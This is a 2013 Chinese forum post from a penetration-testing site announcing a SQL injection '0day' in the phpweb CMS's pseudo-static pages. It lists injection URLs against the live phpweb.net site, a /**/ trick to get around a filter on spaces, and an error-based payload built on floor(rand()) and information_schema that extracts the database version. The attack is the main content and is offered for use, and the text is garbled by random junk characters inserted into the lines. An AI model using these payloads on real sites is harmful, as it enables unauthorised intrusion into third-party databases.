中国网络渗透测试联盟

标题: phpweb伪静态页面注入0day [打印本页]
作者: admin    时间: 2013-1-4 19:46
标题: phpweb伪静态页面注入0day
phpweb所有的整站程序伪静态页面都存在sql注入
4 n) L9 a# E# u; Z4 F( S- N( N
4 d; x& H4 p9 H' x! P8 d主站:http://phpweb.net/
& M1 \7 f* T$ S) Y" l加’检测:. Z$ n/ x& ~# t' I6 y7 x
6 v6 ~* ~6 ^/ V; U
http://www.phpweb.net/down/html/?772′.html
8 y$ I& Z$ |' f
% |  K' a7 K6 ^' n出错
) D; ~1 N6 S3 t. S存在注入。
8 {- u1 n; v8 X& L不能用空格,只能用/*罗
3 X! a5 r9 r) k. Xhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常  o  L6 T0 R, k2 E

5 v6 [8 r* u- h; Vhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
& s" w! h* s/ u' K, _爆数据库版本:
% ]  ]1 k- w8 I0 n8 ]
6 T& @# L' y; S?& C$ I# u, l$ k2 l/ n
1& Z4 `7 E/ X; Y& E
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html" W; B0 ^) b% p4 o" G1 z7 @0 k
更新日期: 2013-01-03 13:39:50        
# l+ ^, B6 {+ ~7 U



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2